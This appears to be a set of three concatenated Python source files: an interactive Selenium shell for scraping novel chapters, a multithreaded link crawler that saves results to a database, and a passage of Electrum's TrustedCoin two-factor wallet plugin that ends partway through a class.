colorama.init()
class ScrapiaShell(Cmd, ScrapiaShellHelper):
"""
Shell for scraping
TODO create a helper class that has methods of current class
that won't be shown in the interactive shell
TODO Create a NovelProfiler class or something as well
"""
# ctx will be used in the class that overrides this one
def __init__(self, isHeadless: int, novelName: str, ctx: Context):
self.toRead_dict: dict = {}
self.read_dict: dict = {}
msg = colored("Initialized ScrapiaShell", "green")
echo(msg)
Cmd.__init__(self)
self.ctx = ctx
self.isHeadless = isHeadless
self.SCRAPER_THREAD = threading.Thread(target=self.startScraping)
# using sys.exit will now kill this thread.
self.SCRAPER_THREAD.daemon = True
self.NOVEL = novelName
# To make sure certain functions run only after `setup` is invoked
self.is_ready: bool = False
self.saveSrc: bool = True # If set, we'll save as html instead.
# Reading from the json file
with open("novel_page_info.json", "r") as novel_page_fobj:
# Refer to the above json files to understand this mess
novel_page_dict: dict = load(novel_page_fobj)
self.NOVEL_PAGE_INFO: dict[str, str] = novel_page_dict["novel_page_info"][
novelName
]
# These will be used later on
self.CH_NO: int = 0
self.NOVEL_PATH = self.NOVEL_PAGE_INFO["NOVEL_PATH"].rstrip("/")
self.ACCORDIAN_TXT = self.NOVEL_PAGE_INFO["ACCORDIAN_TXT"]
# initialize here to avoid errors, as self.DATABASE is used after it
ScrapiaShellHelper.__init__(
self, self.NOVEL_PATH, novelName, self.ACCORDIAN_TXT
)
# create a DBHelper class and make NovelProfiler inherit it
self.mydb, self.cursor = self.getConAndCur(self.DATABASE)
self.CH_NO = self.getChapterNumberFrmDB(
self.mydb, self.cursor, self.TABLE, self.NOVEL
)
self.driver = self.setup_browser(self.GECKO_EXE_PATH, isHeadless)
self.prompt = colored(f"({self.NOVEL}) ", "red")
intro = colored("Hi! Enter `help` for...well...help...", "green")
def do_make_profile(self, *args) -> None:
greenColorNovelName = colored(self.NOVEL, "green")
echo(f"Starting profile creation for {greenColorNovelName}")
self.makeNovelProfile(self.driver, self.NOVEL_PAGE_INFO["NOVEL_PAGE"])
def do_nextPage(self, *args) -> None:
"""Finds and clicks the `Next` button"""
self.driver.execute_script(self.clickElementStartingWithStrS("span", "Next"))
def increment_ch_no(self, commitOnly: bool = False) -> None:
"""
- Default behaviour: Increment `CH_NO` by 1
- On setting `commit` to `True`: Don't increment, commit to database
NOTE set `commit` to `True` only when program is about to/ made to end
"""
if commitOnly:
con, cur = self.getConAndCur(self.DATABASE)
with con:
cur.execute(f"UPDATE {self.TABLE} SET {self.NOVEL}={self.CH_NO};")
return
self.CH_NO += 1
def scrape_gotoNextPage_sleep(self) -> None:
"""
(NOTE) Order matters here. After successfully scraping a page, it will go
to the next page and then sleep.
Giving enough time to the content to load.
"""
self.do_scrape()
self.do_nextPage()
sleep(int(self.cfg["PROJECT"]["SLEEP_TIME_AFTER_SCRAPE"]))
def startScraping(self) -> None:
"""
- `target` of `self.SCRAPER_THREAD` object.
- invoked by `self.do_start_scraping` in a thread.
"""
try:
if not self.is_ready:
self.do_setup()
self.read_dict, self.toRead_dict = self.readJsonsReturnDict()
indexList = list(self.toRead_dict.keys())
scrapeCount = 0
print("WHILE----------LOOP----------Initialized")
while self.toRead_dict:
self.scrape_gotoNextPage_sleep()
# updating the values
indexList, self.toRead_dict, self.read_dict = popFirstElementUpdateOtherDict(
indexList, self.toRead_dict, self.read_dict
)
scrapeCount += 1
if scrapeCount % 5 == 0:
self.increment_ch_no(commitOnly=True)
saveNovelProfile(self, self.toRead_dict, self.read_dict)
scrapeCount = 0
print("All present chapters scraped...\nEnding...")
self.do_end_cleanly()
saveNovelProfile(self, self.toRead_dict, self.read_dict)
except KeyboardInterrupt:
# save before ending
saveNovelProfile(self, self.toRead_dict, self.read_dict)
print("KEYBOARD----------INTERRUPT----------INVOKED")
self.do_end_cleanly()
return
except Exception:
saveNovelProfile(self, self.toRead_dict, self.read_dict)
print("----------ERROR----------")
print_exc()
self.do_end_cleanly()
return
def do_ch_no(self, *args) -> None:
"""Perform operations on `self.CH_NO`."""
option = str(input("(show/change)? ")).strip()
if option == "show":
print(self.CH_NO)
elif option == "change":
try:
self.CH_NO = int(input("New value: ").strip())
except Exception as e:
print(e, "Retry with a the correct value next time.", sep="\n")
return None
else:
print("Aborting!")
def do_cls(self, *args) -> None:
"""Clear screen"""
clrScrn(clear)
def do_commit(self, *args) -> None:
"""
- Commit current value of `self.CH_NO` to database.
NOTE you can change the value using `ch_no`"""
self.increment_ch_no(commitOnly=True)
def do_current_url(self, *args) -> None:
try:
echo(f"We are in: \t{self.driver.current_url}")
except Exception as e:
echo(e + "\n\n" + "Try invoking `setup` first")
return None
def do_get(self, *args):
"""Prompts for a url and invokes `self.__driver.get(<url>)`"""
url: str = input("Enter url: ").strip()
self.driver.get(url)
def do_end_cleanly(self, onlyDriverQuit: bool = False, *args):
"""Invoke two functions:
1) `increment_ch_no(commit=True)`
2) `driver.quit()`
Simply quits the driver if `onlyDriverQuit` is set to `True`.
NOTE
- `end_cleanly` does 'NOT' end the program execution
- just closes the browser and commits to db
"""
if onlyDriverQuit:
self.driver.quit()
return
# TODO Change code later
# don't take current_ch_no, take current index number
# which will be found using the profiler
current_ch_no: str = self.chapterNumberFromURL(
self.driver.current_url, return_as_is=True
)
if (
current_ch_no
): # we want to save the ch_no of the chapter we are presently in
self.CH_NO = int(current_ch_no)
self.increment_ch_no(commitOnly=True)
self.driver.quit()
def do_exit(self, *args) -> bool:
"""Exit the interactive shell"""
try:
if self.read_dict or self.toRead_dict:
saveNovelProfile(self, self.toRead_dict, self.read_dict)
if self.is_ready:
self.CH_NO = int(
self.chapterNumberFromURL(
self.driver.current_url, return_as_is=True
)
)
except ValueError:
pass
finally:
self.do_end_cleanly(onlyDriverQuit=not (self.is_ready))
exit() # This kills the daemon
def do_is_ready(self, show: bool = False, *args) -> None:
"""This is for manually telling the shell that we have now completed `setup`."""
if show:
print("This is the value of `self.is_ready`:", self.is_ready)
elif self.is_ready:
echo("It is already set to True!")
else:
self.is_ready = True
echo("Value has been set to True!")
def do_pr_pgsrc(self, *args):
"""Prints the page source to stdout"""
print(self.driver.page_source)
def do_reinitiate(self, *args) -> None:
"""Re-initiates the driver object for smoothly re-running from the terminal itself"""
option = input(
"THIS WILL CLOSE ANY RUNNING INSTANCES OF SELENIUM IN THIS THREAD\nCONTINUE? (y/n): "
)
if option == "y":
self.do_end_cleanly()
self.driver = self.setup_browser(self.GECKO_EXE_PATH, self.isHeadless)
else:
return None
def do_reinitiate_everything(self, *args) -> None:
"""This will re-initiate everything, including the shell class."""
option = input(
"THIS WILL CLOSE ANY RUNNING INSTANCES OF SELENIUM IN THIS THREAD\nCONTINUE? (y/n): "
)
if option == "y":
novel_name: str = input(f"{self.prompt}Enter novel name: ").strip()
self.do_end_cleanly()
self.__init__(self.isHeadless, novel_name, self.ctx)
def do_scrape(self, *args) -> None:
"""`scrape` does the following:\n
Get relevant content from the website and then save it in a file `NOVEL_SAVE_PATH`.\n
Increment the value of global variable `CH_NO` by one and output the title of the webpage scraped."""
if not self.is_ready:
echo("Can run only after `setup` is invoked!")
return None
# the filename including the chapters from now on should be saved as `<last_part_of_url>.txt`
URL_LAST_PART: str = self.driver.current_url.rstrip("/").split("/")[-1]
# file_ext: str = "txt" # default value
file_ext = "html"
story_content = self.driver.page_source
# TODO save as f"Chapter-{customIndex}"
with open(f"{self.NOVEL_PATH}/{URL_LAST_PART}.{file_ext}", "w") as f:
f.write(story_content)
self.increment_ch_no()
print(f"{URL_LAST_PART} scraped successfully...\n")
# Setting up everything
def do_setup(self, *args) -> None:
"""This has something to do with the way the site is designed, go to any random chapter and inspect the page source
in the source a `div` has the `back button, the link to the novel page, the next button` (in this order)
what this code does is simply returns a list of the WebElement objects that refer to these elements respectively.
and since I know that I'm supposed to go to the next chapter, I simply choose the last element and click it."""
# TODO Change!!!
# You no longer need to open accordians and search for chapter names and shit
# Now simply fetch the latest link using novel profiler
# driver.get that link and start_scraping from there
try:
self.is_ready = True
echo("Installing addon...")
self.installAddon_cleanTabs_getLoginWindow(self.driver)
echo("Done. Sleeping for 2 seconds.")
sleep(2)
echo("logging in to website...")
self.loginToWebsite(self.driver)
echo("Done. Sleeping for 2 seconds.")
sleep(2)
# TODO put code to directly goto chapter, using indexed link
toRead_dict = self.readJsonsReturnDict()[1]
self.driver.get(toRead_dict[tuple(toRead_dict.keys())[0]][0])
self.driver.implicitly_wait(5)
# This is all it does.
# It's basically creating (or `setting up`) a scenario that makes scraping through the click method possible
except exceptions.NoSuchElementException as e:
print("EXCEPTION-----from self.do_setup")
print(e, "Try to invoke `start_scraping`", sep="\n\n")
except Exception as e:
self.is_ready = False
print(e, "FROM self.do_setup", sep="\n\n")
finally:
print(
"The start_scraping function should be working no matter what.",
"If you're having trouble with this function, consider manually going to the required chapter.",
"And invoking `start_scraping`, it should start scraping then.\n\n",
)
return
def do_start_scraping(self, *args):
"""This will run the `self.__start_scraping` helper function in a thread. This particular function also
deals with any function calls that might try to `start` the same thread again."""
try:
self.SCRAPER_THREAD.start()
except RuntimeError as e:
print(e, "The function is probably already running!", sep="\n")
return None
def saveNovelProfile(shellObj: ScrapiaShell, toRead_dict, read_dict):
"""
1) Open json files corresponding to the inputted dict objects
2) dump data in them
"""
with open(shellObj.retFilePath("toRead"), "w") as save_toReadFobj, open(
shellObj.retFilePath("read"), "w"
) as save_readFobj:
dump(toRead_dict, save_toReadFobj, indent=2)
dump(read_dict, save_readFobj, indent=2)
def popFirstElementUpdateOtherDict(keyList: list, *ds: dict | None):
"""
1) pop first element from d1
2) update d2 with popped element
3) pop first element from keyList
4) return elements in the order they were inputted
"""
d1, d2 = ds
if not d2:
d1.pop(keyList.pop(0))
else:
d2.update({keyList[0]: d1.pop(keyList.pop(0))})
return keyList, d1, d2
|
main.py
|
import threading
import time
import pymysql
from module.crawling import *
from module.input_processing import *
from module.save_db import *
class main_ctrler():
def __init__(self):
self.input = input_data("config/link_hunter.sample_input.txt", "config/link_hunter.config",
"config/link_hunter.patterns")
self.input.input_parser()
self.input.urls.reverse()
self.urls = self.input.urls
'''
self.urls = queue.Queue()
for url in self.input.urls:
self.urls.put_nowait(url)
'''
self.configs = self.input.configs
self.patterns = self.input.patterns
self.total_result = []
self.db = save_db(self.configs, self.patterns)
self.db.remove_table()
self.db.create_table()
def one_url_processor(self):
#url = self.urls.get()
url = self.urls.pop()
crawler = crawling(url, self.configs, self.patterns, self.db)
crawler.crawling_process()
print('==================================================')
self.total_result.extend(crawler.result)
def total_urls_processor(self):
self.threads = []
self.max_threads = 30
while self.threads or self.urls:
for thread in self.threads:
if not thread.is_alive():
self.threads.remove(thread)
while len(self.threads) < self.max_threads and self.urls:
thread = threading.Thread(target=self.one_url_processor)
thread.setDaemon(True)
thread.start()
self.threads.append(thread)
for element in self.total_result:
self.db.store_data(element[0], element[1], element[2], element[3], element[4], element[5])
self.db.db_close()
if __name__ == '__main__':
start_time = time.time()
app = main_ctrler()
app.total_urls_processor()
elapsed_time = time.time() - start_time
print(elapsed_time)
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, bitcoin
from electrum.bitcoin import TYPE_ADDRESS
from electrum.bip32 import BIP32Node, xpub_type
from electrum.crypto import sha256
from electrum.transaction import TxOutput
from electrum.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import StorageEncryptionVersion
from electrum.network import Network
from electrum.base_wizard import BaseWizard, WizardWalletPasswordSetting
from electrum.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage, *, config):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage, config=config)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.storage.get('trustedcoin_billing_addresses', {}),
'segwit': self.storage.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self):
default = self.min_prepay()
n = self.config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay()
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, fixed_fee, change_addr)
fee = self.extra_fee() if not is_sweep else 0
if fee:
address = self.billing_info['billing_address_segwit']
fee_output = TxOutput(TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize()
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.storage.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(repr(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
